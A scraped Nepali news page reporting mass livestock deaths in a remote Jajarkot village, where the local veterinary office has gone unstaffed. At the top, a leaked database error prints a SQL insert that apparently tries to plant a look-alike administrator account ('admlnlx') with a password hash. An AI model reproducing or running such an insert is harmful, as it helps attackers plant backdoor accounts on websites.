WordPress database error: [Duplicate entry '0' for key 'PRIMARY']
INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BtHO6wOOa5ZZDz2ufWgQRNC8RtQ8KX0', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-02-27 07:08:51', '', 'admlnlx', 'admlnlx')


Warning: Trying to access array offset on value of type bool in /home/gaulekhabar.com/public_html/wp-content/themes/nepali-news-portal/header.php on line 21
भकाभक पशुचौपाया मरे, तर पशु चिकित्सक छैनन् – Gaule Khabar

भकाभक पशुचौपाया मरे, तर पशु चिकित्सक छैनन्

भकाभक पशुचौपाया मरे, तर पशु चिकित्सक छैनन्

जाजरकोट,माघ ४ –

यहाँको दुर्गम गर्खाकोट–४ मा भकाभक गाई, गोरु मर्न थालेपछि किसान मर्कामा परेका छन् ।

टाउको सुन्निने, ¥याल निकाल्ने र घाँस खानछोडेलगत्तै गाईगोरु मर्ने गरेका स्थानीयवासी तथा दीपेन्द्र प्राविका प्रधानाध्यापक वीरबहादुर शाहीले जानकारी दिनुभयो ।

दैनिक गाई, गोरु, बाख्रा, भेडा दर्जनौँको हिसाबले मरेपनि गर्खाकोटमा रहेको पशु सेवा कार्यालयमा कर्मचारी नहुँदा किसान मर्कामा परेका हुन् । विगत दुई महिनादेखि यहाँको पशु सेवा कार्यालयका कर्मचारी नदेखिएको शाहीले बताउनुभयो ।

त्यस्तै, टाउको सुन्निने, पेट फुल्ने समस्याले गर्दा रामीडाँडा गाविसमा पनि समस्या परेको छ । जिल्ला पशुसेवा कार्यालयमा पटकपटक सम्पर्क गर्न खोज्दा फोन नउठेका कारण सम्पर्क हुन सकेन । – रासस

तपाइको प्रतिक्रिया दिनुहोस्

Your email address will not be published. Required fields are marked *

हामी तपाईंको इमे अरू सैसँग साझा र्दैनं।

ट्रेन्डिङ

धेरै कमेन्ट गरिएका